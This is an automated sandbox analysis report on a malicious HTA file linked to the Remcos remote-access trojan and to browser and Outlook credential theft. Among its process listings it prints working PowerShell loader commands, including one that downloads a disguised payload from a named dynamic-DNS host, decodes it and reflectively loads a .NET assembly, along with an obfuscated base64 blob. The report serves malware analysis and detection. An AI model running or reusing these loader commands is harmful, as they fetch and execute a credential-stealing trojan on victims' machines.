Analysis Overview
SHA256
af3d6095ad1ce9cc31549c93bf7858e2989d725e2c7a34adb975b76c09bac8ba
Threat Level: Known bad
The file 367299f3b78921590e30252fcc114cc7.hta was found to be: Known bad.
Malicious Activity Summary
Remcos
Credentials from Password Stores: Credentials from Web Browsers
NirSoft MailPassView
NirSoft WebBrowserPassView
Detected Nirsoft tools
Blocklisted process makes network request
Evasion via Device Credential Deployment
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious behavior: MapViewOfSection
Modifies Internet Explorer settings
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-07 06:53
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-07 06:53
Reported
2024-08-07 06:55
Platform
win7-20240729-en
Max time kernel
19s
Max time network
20s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\367299f3b78921590e30252fcc114cc7.hta"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'[base64 payload removed]'+[chAR]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'[base64 payload removed]'+[chAR]34+'))')))"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5r1u6emx.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES64FB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC64FA.tmp"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated base64 payload removed]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('≩ ⫻ ㏤ ≪ ㏴','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.BNRT/88/531.291.371.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"
Network
| Country | Destination | Domain | Proto |
| US | 107.173.192.135:80 | 107.173.192.135 | tcp |
| US | 8.8.8.8:53 | servidorwindows.ddns.com.br | udp |
| BR | 191.55.76.236:80 | servidorwindows.ddns.com.br | tcp |
Files
\??\c:\Users\Admin\AppData\Local\Temp\5r1u6emx.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\5r1u6emx.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\CSC64FA.tmp
C:\Users\Admin\AppData\Local\Temp\RES64FB.tmp
C:\Users\Admin\AppData\Local\Temp\5r1u6emx.dll
C:\Users\Admin\AppData\Local\Temp\5r1u6emx.pdb
C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
\??\PIPE\srvsvc
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-07 06:53
Reported
2024-08-07 06:55
Platform
win10v2004-20240802-en
Max time kernel
147s
Max time network
133s
Command Line
Signatures
Remcos
Credentials from Password Stores: Credentials from Web Browsers
Detected Nirsoft tools
NirSoft MailPassView
NirSoft WebBrowserPassView
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 412 set thread context of 4804 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4804 set thread context of 2664 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4804 set thread context of 3136 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4804 set thread context of 3168 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\367299f3b78921590e30252fcc114cc7.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'[base64 payload removed]'+[chAR]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'[base64 payload removed]'+[chAR]34+'))')))"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qhsluqks\qhsluqks.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9877.tmp" "c:\Users\Admin\AppData\Local\Temp\qhsluqks\CSC808E1BBE59894277B6474D5926CDD25.TMP"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated base64 payload removed] …
≪ ㏴BC≩ ⫻ ㏤ ≪ ㏴EE≩ ⫻ ㏤ ≪ ㏴UwBF≩ ⫻ ㏤ ≪ ㏴DY≩ ⫻ ㏤ ≪ ㏴N≩ ⫻ ㏤ ≪ ㏴Bf≩ ⫻ ㏤ ≪ ㏴EU≩ ⫻ ㏤ ≪ ㏴TgBE≩ ⫻ ㏤ ≪ ㏴D4≩ ⫻ ㏤ ≪ ㏴Pg≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴V≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴Ek≩ ⫻ ㏤ ≪ ㏴bgBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴BP≩ ⫻ ㏤ ≪ ㏴GY≩ ⫻ ㏤ ≪ ㏴K≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BG≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴Ck≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴aQBt≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴ZwBl≩ ⫻ ㏤ ≪ ㏴FQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴LgBJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴TwBm≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BG≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴Ck≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴Zg≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bz≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴YQBy≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴LQBn≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴w≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴LQBh≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴LQBn≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Hs≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴r≩ ⫻ ㏤ ≪ ㏴D0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BG≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴T≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴ZwB0≩ ⫻ ㏤ ≪ ㏴Gg≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴YgBh≩ 
⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴ZQ≩ ⫻ ㏤ ≪ ㏴2≩ ⫻ ㏤ ≪ ㏴DQ≩ ⫻ ㏤ ≪ ㏴T≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴ZwB0≩ ⫻ ㏤ ≪ ㏴Gg≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴t≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bz≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴YQBy≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴YQBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Ng≩ ⫻ ㏤ ≪ ㏴0≩ ⫻ ㏤ ≪ ㏴EM≩ ⫻ ㏤ ≪ ㏴bwBt≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴YQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴YQBn≩ 